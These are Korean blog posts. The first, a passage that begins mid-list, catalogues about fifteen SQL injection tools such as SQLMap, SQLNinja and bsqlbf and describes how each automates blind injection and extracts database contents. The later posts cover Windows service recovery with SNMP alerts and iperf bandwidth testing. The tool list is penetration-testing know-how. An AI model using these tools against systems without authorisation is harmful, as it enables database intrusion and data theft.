취약점이 있는 URL을 검사하고 사용자의 개입없이 SQL Injection 취약점을 익스플로잇하기 위해 필요한 정보를 점검합니다. 다운로드

2. SQLbftools -
블라인드 SQL Injection 공격을 사용하여 MySQL의 정보를 가져오는 시도를 하는 도구의 모음입니다. 다운로드

3. SQL Injection Brute-forcer - SQL Injection
공격 취약점을 찾고 이를 이용하여 공격하는 자동화 도구입니다. 사용자가 작업하는 내용을 볼 수 있으며, 블라인드 SQL 인젝션을 이용합니다. 다운로드

5. SQL Brute -
블라인드 SQL 인젝션 취약점을 사용하여 데이터베이스에서 데이터를 추출해내는 무작위 도구입니다. MS SQL 서버의 시간, 오류 기반으로 익스플로잇을 수행합니다. 오라클의 경우 오류를 기반으로 합니다. 이 프로그램은 Python으로 작성되었으며 멀티 스레드로 동작하며 표준 라이브러리를 사용합니다. 다운로드

5. BobCat - SQL Injection
취약점의 잇점을 이용하는 감사 도구입니다. 사용자가 사용하는 애플리케이션이 액세스하는 테이블에서 데이터를 가져올 수 있습니다. 다운로드

6. SQLMap -
블라인드 SQL Injection을 자동으로 수행하는 도구로 phthon으로 개발되었다. 다운로드

7. Absinthe - GUI
기반의 도구로 블라인드 SQL Injection 취약점에 이용하여 데이터베이스의 스키마와 목록을 자동화 과정으로 다운로드합니다. 다운로드

8. SQL Injection Pen-testing Tool -
웹 애플리케이션에서의 취약점을 찾아 데이터베이스를 점검하도록 설계된 GUI 기반의 도구. 다운로드

9. SQID - SQL Injection Digger.
웹 사이트의 통상적인 오류와 SQL Injection을 찾는 명령행 기반의 도구. 웹 페이지에서 SQL Injection 이 가능한 부분을 찾아내어 취약점을 입력하는 폼을 테스트한다. 다운로드

10. Blind SQL Injection Perl Tool - bsqlbf
SQL Injection에 취햑한 웹 사이트에서 정보를 가져오도록 작성된 펄 스크립트. 다운로드

11. SQL Power Injection Injector -
이 프로그램은 웹페이지에서 SQL 명령어를 삽입하는 테스트를 수행합니다. 멀티 스레드 방식으로 블라인드 SQL Injection 공격을 자동화하여 실행합니다. 다운로드 

12. FJ-Injector Framework -
웹 애플리케이션에 SQL Injection 취약점이 있는지 검사하기 위해 디자인된 오픈 소스 무료 프로그램입니다. HTTP 요청을 가로쳐서 변경하기 위한 프록시 기능도 제공합니다. SQL Injection 익스플로잇을 자동화하여 수행합니다. 다운로드

13. SQLNinja - MS SQL
서버를 백 엔드 데이터베이스로 사용하는 웹 애플리케이션의 SQL Injection 취약점을 익스플로잇하는 도구입니다. 다운로드

14. Automatic SQL Injector - SQLNinja
와 유사한 도구로, 오류 코드가 반환되는 SQL Injection 취약점을 자동으로 찾아 줍니다. 다운로드

15. NGSS SQL Injector -
데이터베이스에 저장된 데이터를 액세스하기 위한 SQL Injection취약점을 이용하여 익스플로잇합니다. Access, DB2, Informix, MSSQL, MySQL, Oracle, Sysbase 등 다양한 데이터베이스를 지원합니다. 다운로드


Posted by yangdaegam
l

 

 

실행 -> services.msc -> 원하는 서비스 선택. -> 속성 -> 복구 -> 재시작이나 재부팅 시킬수 있습니다.

재부팅시에는 본인이 원하는 메세지로 넣어 SNMP Trap 할수 있으며, SNMP 툴에서 이를 잡아.

제 메일주소로 자동 푸시되도록 해놨습니다.

푸시된 메일은 아이폰을 통해 언제 어디서라도 실시간 확인하고 있습니다.

Posted by yangdaegam
l

Posted by yangdaegam
l
출처 : http://repository.egloos.com/5166176

클라이언트와 서버간의 네트워크 대역폭을 체크하는 프로그램이다.
UDP로 체크하면 패킷 유실사항을 확인할 수 있다.

[ 다운로드 ]
소스파일: http://dast.nlanr.net/Projects/Iperf/iperf-1.7.0-source.tar.gz
윈도우용: jperf-2.0.0.zip

클라이언트  ----> 서버

[ 서버 설정(ip: 192.168.10.2) ]
# iperf -s
서비스에 등록
# iperf -s -D
서비스에서  제거
# iperf -s -R

[ 클라이언트 설정 ]
# iperf -c 192.168.10.2 -i 1

보다 다양한 서버/클라이언트 설정이있으며 help를 확인

아래 이미지는 윈도우용 jperf 실행 모습이다.
비쥬얼한것이 사용하기 편하다. 압축을 풀고 실행파일을 실행하면된다.

Posted by yangdaegam
l